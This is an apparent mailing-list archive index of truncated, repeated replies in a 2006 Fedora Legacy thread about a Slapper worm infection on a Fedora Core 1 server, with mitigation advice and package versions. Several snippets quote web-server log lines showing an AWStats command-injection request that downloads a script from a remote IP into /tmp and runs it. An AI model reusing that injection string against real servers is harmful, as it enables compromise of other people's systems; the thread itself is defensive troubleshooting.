Re: slapper worm

On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. This doesn't really prevent execution

Re: slapper worm

Hi Peter, On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. This doesn't really

Re: slapper worm

On 2006-01-24 22:13:26 +1000, Michael Mansour wrote: Hi Peter, On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: Definately noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't

Re: slapper worm

Michael Mansour wrote: Hi Marc, On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote: No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when

Re: slapper worm

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jesse Keating wrote: On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE for the ssl issue? I'd

Re: slapper worm

James Kosin wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jesse Keating wrote: On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE

Re: slapper worm

On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Read the link I posted yesterday,

Re: slapper worm

On Tue, 2006-01-24 at 13:20 -0600, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been

Re: slapper worm

Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and

Re: slapper worm

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mike McCarty wrote: --snip-- $ ps -A | grep pache $ ps -A | grep ssl doesn't show anything, so Apache isn't running, and I guess SSL isn't either. Mike Mike, ps -A | grep httpd /* Apache is only the name of the server

Re: slapper worm

Hi Mike, You should do a netstat -na | grep SYN, if you see alot of those then slapper is there DOS attacking people. $ netstat -na | grep SYN $ Thanks for the advice. But, as I am behind a stealth firewall, I feel relatively secured against *this* type of attack. Umm, what does

Re: slapper worm

On Tuesday 24 January 2006 14:00, Gene Heskett wrote: If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? As Michael Mansour discovered, he had this file on only one of three FC1 machines after he installed Drupal,

Re: slapper worm

of the Fedora Legacy Project fedora-legacy-list@redhat.com To: Discussion of the Fedora Legacy Project fedora-legacy-list@redhat.com Subject: Re: slapper worm Date: Tue, 24 Jan 2006 13:08:52 -0600 James Kosin wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jesse Keating wrote: On Mon, 2006-01-23

Re: slapper worm

On Tuesday 24 January 2006 15:18, Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why

Re: slapper worm

On Tuesday 24 January 2006 15:29, Mike McCarty wrote: Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper

Re: slapper worm

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Michael Mansour wrote: Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1, but in analysing now how

Re: slapper worm

Hi James, -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Michael Mansour wrote: Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1,

Re: slapper worm

On Mon, 2006-01-23 at 15:42 -0500, James Kosin wrote: Michael, Try my version of httpd here: http://support.intcomgrp.com/~jkosin It has been effective against the worm so far. James, what is in your package that we haven't included in our Apache? I was under the assumption that we had

Re: slapper worm

Michael Mansour wrote: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows

Re: slapper worm

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jesse Keating wrote: James, what is in your package that we haven't included in our Apache? I was under the assumption that we had fixed all the CVEs related to the slapper worm and that our users were safe. If this isn't the case, we have a

Re: slapper worm

Hi Kelson, Michael Mansour wrote: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0

Re: slapper worm

On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline. -- Jesse

Re: slapper worm

On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote: I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? What version of php are you running? Marc.

Re: slapper worm

Hi Marc, On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote: I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? What version of php are

Re: slapper worm

Hi Marc, On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote: No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1

Re: slapper worm

On Monday 23 January 2006 14:32, Michael Mansour wrote: 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft